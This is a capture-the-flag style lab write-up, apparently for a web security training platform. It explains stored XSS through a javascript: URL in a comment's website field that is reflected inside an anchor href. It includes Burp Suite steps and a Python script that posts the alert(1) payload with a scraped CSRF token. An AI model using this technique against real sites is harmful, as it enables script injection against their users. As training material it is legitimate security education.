XSS Lab 8
Stored XSS into an anchor href attribute by injecting a javascript: URL
Stored XSS into anchor href attribute with double quotes HTML-encoded#
This lab contains a stored cross-site scripting (XSS) vulnerability in the comment functionality. The application reflects the “Website” input inside an anchor <a href="...">
attribute and HTML-encodes double quotes, which prevents straightforward attribute-breaking payloads. By supplying a javascript:
URL as the website value and using Burp Suite to intercept and replay requests, it’s possible to inject a JavaScript URL that executes when the comment author name (the anchor) is clicked. This technique demonstrates how XSS can be achieved even when quotes are encoded, by taking advantage of a reflected URL context.
How Exploit Works#
- The comment “Website” field is reflected inside an anchor
href
attribute on the post page. - Double quotes are HTML-encoded, preventing breaking out of the attribute, but
javascript:
URLs insidehref
still execute when navigated to. - Submit a benign value first (random alphanumeric) and observe it being reflected inside the anchor
href
via Burp Repeater. - Replace the reflected value with
javascript:alert(1)
in the intercepted request and resend. - Verify by right-clicking the author name, copying the URL, pasting it into the address bar, or clicking the name — the injected
javascript:
URL should trigger the alert. - This is a stored XSS because the payload is saved and later executed when the anchor is used.
Usage#
python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmdExploit#
exploit.py
import requests, sys, urllib3
from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}
def check_burp():
try:
requests.get("http://127.0.0.1:8080", proxies=proxies, timeout=3, verify=False)
except:
print("[-] Burp Suite not running.")
sys.exit(1)
def exploit_xss(url, payload):
s = requests.Session()
s.proxies, s.verify = proxies, False
post_page = url.rstrip("/") + "/post?postId=5"
r = s.get(post_page); r.raise_for_status()
soup = BeautifulSoup(r.text, "html.parser")
csrf = soup.find("input", {"name": "csrf"})["value"]
data = {
"csrf": csrf,
"postId": "5",
"comment": "xss",
"name": "test",
"email": "[email protected]",
"website": payload
}
s.post(url.rstrip("/") + "/post/comment", data=data).raise_for_status()
if "Congratulations" in s.get(url).text:
print("[+] Lab solved! 🎉"); return True
return False
def main():
if len(sys.argv) != 2:
print(f"Usage: python {sys.argv[0]} <url>"); sys.exit(1)
check_burp()
print("[*] Attempting XSS...")
if exploit_xss(sys.argv[1], 'javascript:alert(1)'):
print("[+] XSS successful!")
else:
print("[-] XSS unsuccessful.")
if __name__ == "__main__":
main()
python